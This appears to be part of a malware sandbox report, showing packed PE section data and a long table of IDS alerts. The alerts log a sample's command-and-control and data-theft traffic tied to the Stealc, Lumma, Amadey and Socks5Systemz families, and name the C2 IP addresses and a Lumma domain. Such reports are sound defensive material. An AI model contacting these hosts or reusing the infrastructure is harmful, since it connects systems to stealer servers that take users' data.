	0x1000	0x249000	0x16200	0b6374b36759747fd2db99a0cae3eebb	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x24a000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x24b000	0x1000	0x200	0d0399d83a742d5d86c5718841e8e842	False	0.134765625	data	0.8646718654202081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x24c000	0x2aa000	0x200	c3313e37274cf27d5d582c2d6447a470	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ylgrvzmt	0x4f6000	0x1a1000	0x1a0c00	605b7b6134f998fcebf41f6e14c104bf	False	0.9950445457783443	data	7.954314747834039	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
sdrnsjgb	0x697000	0x1000	0x400	1ad1ee2075c0aab674db23e9671b7d48	False	0.806640625	MS Windows COFF Motorola 68000 object file	6.271518432143894	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x698000	0x3000	0x2200	d48bd1aab76ee46848149a982cf70e8a	False	0.06594669117647059	DOS executable (COM)	0.7609932638172845	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-15T14:09:06.842987+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50750	185.208.158.202	80	TCP
2024-11-15T14:09:06.842987+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50750	185.208.158.202	80	TCP
2024-11-15T14:09:08.095355+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-15T14:09:08.391568+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-15T14:09:08.397783+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.4	49730	TCP
2024-11-15T14:09:08.685127+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-15T14:09:08.692282+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.4	49730	TCP
2024-11-15T14:09:09.845624+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-15T14:09:10.374228+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-15T14:09:24.101545+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49752	185.215.113.206	80	TCP
2024-11-15T14:09:25.393179+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49752	185.215.113.206	80	TCP
2024-11-15T14:09:26.222804+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49752	185.215.113.206	80	TCP
2024-11-15T14:09:26.929410+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49752	185.215.113.206	80	TCP
2024-11-15T14:09:28.632290+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49752	185.215.113.206	80	TCP
2024-11-15T14:09:29.170037+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49752	185.215.113.206	80	TCP
2024-11-15T14:09:33.601147+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49761	185.215.113.16	80	TCP
2024-11-15T14:10:05.112005+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	49797	185.215.113.43	80	TCP
2024-11-15T14:10:08.544645+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49816	176.113.115.203	80	TCP
2024-11-15T14:10:18.704009+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	49810	TCP
2024-11-15T14:10:19.629466+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49877	185.215.113.43	80	TCP
2024-11-15T14:10:20.556229+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49883	185.215.113.16	80	TCP
2024-11-15T14:10:28.395676+0100	2057396	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs)	1	192.168.2.4	52934	1.1.1.1	53	UDP
2024-11-15T14:10:28.926304+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49927	185.215.113.43	80	TCP
2024-11-15T14:10:29.119818+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	49932	104.21.80.55	443	TCP
2024-11-15T14:10:29.119818+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49932	104.21.80.55	443	TCP
2024-11-15T14:10:29.700115+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49932	104.21.80.55	443	TCP
2024-11-15T14:10:29.700115+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49932	104.21.80.55	443	TCP
2024-11-15T14:10:29.861202+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49934	185.215.113.16	80	TCP
2024-11-15T14:10:30.456945+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	49940	104.21.80.55	443	TCP
2024-11-15T14:10:30.456945+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49940	104.21.80.55	443	TCP
2024-11-15T14:10:30.949764+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49940	104.21.80.55	443	TCP
2024-11-15T14:10:30.949764+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49940	104.21.80.55	443	TCP
2024-11-15T14:10:32.033894+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	49950	104.21.80.55	443	TCP
2024-11-15T14:10:32.033894+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49950	104.21.80.55	443	TCP
2024-11-15T14:10:32.858950+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49950	104.21.80.55	443	TCP
2024-11-15T14:10:33.684895+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	49961	104.21.80.55	443	TCP
2024-11-15T14:10:33.684895+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49961	104.21.80.55	443	TCP
2024-11-15T14:10:35.264497+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	49972	104.21.80.55	443	TCP
2024-11-15T14:10:35.264497+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49972	104.21.80.55	443	TCP
2024-11-15T14:10:37.511970+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	49983	104.21.80.55	443	TCP
2024-11-15T14:10:37.511970+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49983	104.21.80.55	443	TCP
2024-11-15T14:10:38.737531+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49989	185.215.113.43	80	TCP
2024-11-15T14:10:39.264294+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49990	185.215.113.206	80	TCP
2024-11-15T14:10:40.979850+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50002	104.21.80.55	443	TCP
2024-11-15T14:10:40.979850+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50002	104.21.80.55	443	TCP
2024-11-15T14:10:41.585296+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50005	104.21.80.55	443	TCP
2024-11-15T14:10:41.585296+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50005	104.21.80.55	443	TCP
2024-11-15T14:10:42.130405+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50005	104.21.80.55	443	TCP
2024-11-15T14:10:42.130405+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50005	104.21.80.55	443	TCP
2024-11-15T14:10:42.696459+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50009	185.215.113.43	80	TCP
2024-11-15T14:10:42.887400+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50015	104.21.80.55	443	TCP
2024-11-15T14:10:42.887400+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50015	104.21.80.55	443	TCP
2024-11-15T14:10:43.389192+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50015	104.21.80.55	443	TCP
2024-11-15T14:10:43.389192+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50015	104.21.80.55	443	TCP
2024-11-15T14:10:43.646350+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50016	185.215.113.16	80	TCP
2024-11-15T14:10:44.623138+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50027	104.21.80.55	443	TCP
2024-11-15T14:10:44.623138+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50027	104.21.80.55	443	TCP
2024-11-15T14:10:46.036185+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50032	104.21.80.55	443	TCP
2024-11-15T14:10:46.036185+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50032	104.21.80.55	443	TCP
2024-11-15T14:10:47.927013+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50044	104.21.80.55	443	TCP
2024-11-15T14:10:47.927013+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50044	104.21.80.55	443	TCP
2024-11-15T14:10:48.431860+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50044	104.21.80.55	443	TCP
2024-11-15T14:10:48.524637+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50048	104.21.80.55	443	TCP
2024-11-15T14:10:48.524637+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50048	104.21.80.55	443	TCP
2024-11-15T14:10:48.963259+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50049	185.215.113.43	80	TCP
2024-11-15T14:10:49.363443+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.4	50051	185.215.113.16	80	TCP
2024-11-15T14:10:49.449018+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50055	104.21.80.55	443	TCP
2024-11-15T14:10:49.449018+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50055	104.21.80.55	443	TCP
2024-11-15T14:10:50.060355+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50055	104.21.80.55	443	TCP
2024-11-15T14:10:50.060355+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50055	104.21.80.55	443	TCP
2024-11-15T14:10:51.489606+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50056	104.21.80.55	443	TCP
2024-11-15T14:10:51.489606+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50056	104.21.80.55	443	TCP
2024-11-15T14:10:51.491371+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50057	104.21.80.55	443	TCP
2024-11-15T14:10:51.491371+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50057	104.21.80.55	443	TCP
2024-11-15T14:10:52.012280+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50057	104.21.80.55	443	TCP
2024-11-15T14:10:52.012280+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50057	104.21.80.55	443	TCP
2024-11-15T14:10:53.162264+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50059	104.21.80.55	443	TCP
2024-11-15T14:10:53.162264+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50059	104.21.80.55	443	TCP
2024-11-15T14:10:53.378380+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50060	104.21.80.55	443	TCP
2024-11-15T14:10:53.378380+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50060	104.21.80.55	443	TCP
2024-11-15T14:10:55.227472+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50062	104.21.80.55	443	TCP
2024-11-15T14:10:55.227472+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50062	104.21.80.55	443	TCP
2024-11-15T14:10:56.045904+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50063	104.21.80.55	443	TCP
2024-11-15T14:10:56.045904+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50063	104.21.80.55	443	TCP
2024-11-15T14:10:56.563564+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50063	104.21.80.55	443	TCP
2024-11-15T14:10:57.131119+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50064	104.21.80.55	443	TCP
2024-11-15T14:10:57.131119+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50064	104.21.80.55	443	TCP
2024-11-15T14:10:57.518544+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.4	50065	185.215.113.16	80	TCP
2024-11-15T14:10:58.184112+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50067	185.215.113.206	80	TCP
2024-11-15T14:11:00.314595+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50074	104.21.80.55	443	TCP
2024-11-15T14:11:00.314595+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50074	104.21.80.55	443	TCP
2024-11-15T14:11:03.705405+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50080	104.21.80.55	443	TCP
2024-11-15T14:11:03.705405+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50080	104.21.80.55	443	TCP
2024-11-15T14:11:04.257281+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	50080	104.21.80.55	443	TCP
2024-11-15T14:11:04.257281+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	50080	104.21.80.55	443	TCP
2024-11-15T14:11:04.809709+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50087	104.21.80.55	443	TCP
2024-11-15T14:11:04.809709+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50087	104.21.80.55	443	TCP
2024-11-15T14:11:08.168703+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50101	104.21.80.55	443	TCP
2024-11-15T14:11:08.168703+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50101	104.21.80.55	443	TCP
2024-11-15T14:11:08.676058+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50101	104.21.80.55	443	TCP
2024-11-15T14:11:08.676058+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50101	104.21.80.55	443	TCP
2024-11-15T14:11:10.229783+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50107	104.21.80.55	443	TCP
2024-11-15T14:11:10.229783+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50107	104.21.80.55	443	TCP
2024-11-15T14:11:10.767283+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50107	104.21.80.55	443	TCP
2024-11-15T14:11:10.767283+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50107	104.21.80.55	443	TCP
2024-11-15T14:11:14.109241+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50117	185.208.158.202	80	TCP
2024-11-15T14:11:14.109241+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50117	185.208.158.202	80	TCP
2024-11-15T14:11:16.158294+0100	2057396	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs)	1	192.168.2.4	55271	1.1.1.1	53	UDP
2024-11-15T14:11:17.265718+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50117	185.208.158.202	80	TCP
2024-11-15T14:11:17.265718+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50117	185.208.158.202	80	TCP
2024-11-15T14:11:18.315529+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50121	185.208.158.202	80	TCP
2024-11-15T14:11:18.315529+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50121	185.208.158.202	80	TCP
2024-11-15T14:11:19.340795+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50123	185.208.158.202	80	TCP
2024-11-15T14:11:19.340795+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50123	185.208.158.202	80	TCP
2024-11-15T14:11:20.081788+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50124	104.21.80.55	443	TCP
2024-11-15T14:11:20.081788+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50124	104.21.80.55	443	TCP
2024-11-15T14:11:20.391584+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50125	185.208.158.202	80	TCP
2024-11-15T14:11:20.391584+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50125	185.208.158.202	80	TCP
2024-11-15T14:11:20.739604+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50124	104.21.80.55	443	TCP
2024-11-15T14:11:20.739604+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50124	104.21.80.55	443	TCP
2024-11-15T14:11:21.460403+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50128	104.21.80.55	443	TCP
2024-11-15T14:11:21.460403+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50128	104.21.80.55	443	TCP
2024-11-15T14:11:21.694091+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50127	185.208.158.202	80	TCP
2024-11-15T14:11:21.694091+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50127	185.208.158.202	80	TCP
2024-11-15T14:11:21.795719+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50128	104.21.80.55	443	TCP
2024-11-15T14:11:21.795719+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50128	104.21.80.55	443	TCP
2024-11-15T14:11:22.731846+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50129	185.208.158.202	80	TCP
2024-11-15T14:11:22.731846+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50129	185.208.158.202	80	TCP
2024-11-15T14:11:23.803766+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50131	185.208.158.202	80	TCP
2024-11-15T14:11:23.803766+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50131	185.208.158.202	80	TCP
2024-11-15T14:11:23.907790+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50132	104.21.80.55	443	TCP
2024-11-15T14:11:23.907790+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50132	104.21.80.55	443	TCP
2024-11-15T14:11:24.848538+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50133	185.208.158.202	80	TCP
2024-11-15T14:11:24.848538+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50133	185.208.158.202	80	TCP
2024-11-15T14:11:25.691175+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50137	104.21.80.55	443	TCP
2024-11-15T14:11:25.691175+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50137	104.21.80.55	443	TCP
2024-11-15T14:11:25.885986+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50136	185.208.158.202	80	TCP
2024-11-15T14:11:25.885986+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50136	185.208.158.202	80	TCP
2024-11-15T14:11:26.303346+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50136	185.208.158.202	80	TCP
2024-11-15T14:11:26.303346+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50136	185.208.158.202	80	TCP
2024-11-15T14:11:27.333374+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50139	185.208.158.202	80	TCP
2024-11-15T14:11:27.333374+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50139	185.208.158.202	80	TCP
2024-11-15T14:11:27.726504+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50140	104.21.80.55	443	TCP
2024-11-15T14:11:27.726504+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50140	104.21.80.55	443	TCP
2024-11-15T14:11:29.412761+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50142	185.208.158.202	80	TCP
2024-11-15T14:11:29.412761+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50142	185.208.158.202	80	TCP
2024-11-15T14:11:30.454383+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50143	185.208.158.202	80	TCP
2024-11-15T14:11:30.454383+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50143	185.208.158.202	80	TCP
2024-11-15T14:11:30.464211+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50145	104.21.80.55	443	TCP
2024-11-15T14:11:30.464211+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50145	104.21.80.55	443	TCP
2024-11-15T14:11:31.491576+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50146	185.208.158.202	80	TCP
2024-11-15T14:11:31.491576+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50146	185.208.158.202	80	TCP
2024-11-15T14:11:32.531881+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50148	185.208.158.202	80	TCP
2024-11-15T14:11:32.531881+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50148	185.208.158.202	80	TCP
2024-11-15T14:11:32.697726+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50149	104.21.80.55	443	TCP
2024-11-15T14:11:32.697726+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50149	104.21.80.55	443	TCP
2024-11-15T14:11:32.702294+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	50149	104.21.80.55	443	TCP
2024-11-15T14:11:33.840497+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50151	185.208.158.202	80	TCP
2024-11-15T14:11:33.840497+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50151	185.208.158.202	80	TCP
2024-11-15T14:11:34.881440+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50153	185.208.158.202	80	TCP
2024-11-15T14:11:34.881440+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50153	185.208.158.202	80	TCP
2024-11-15T14:11:35.124106+0100	2057397	ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)	1	192.168.2.4	50154	104.21.80.55	443	TCP
2024-11-15T14:11:35.124106+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50154	104.21.80.55	443	TCP
2024-11-15T14:11:35.619612+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50154	104.21.80.55	443	TCP
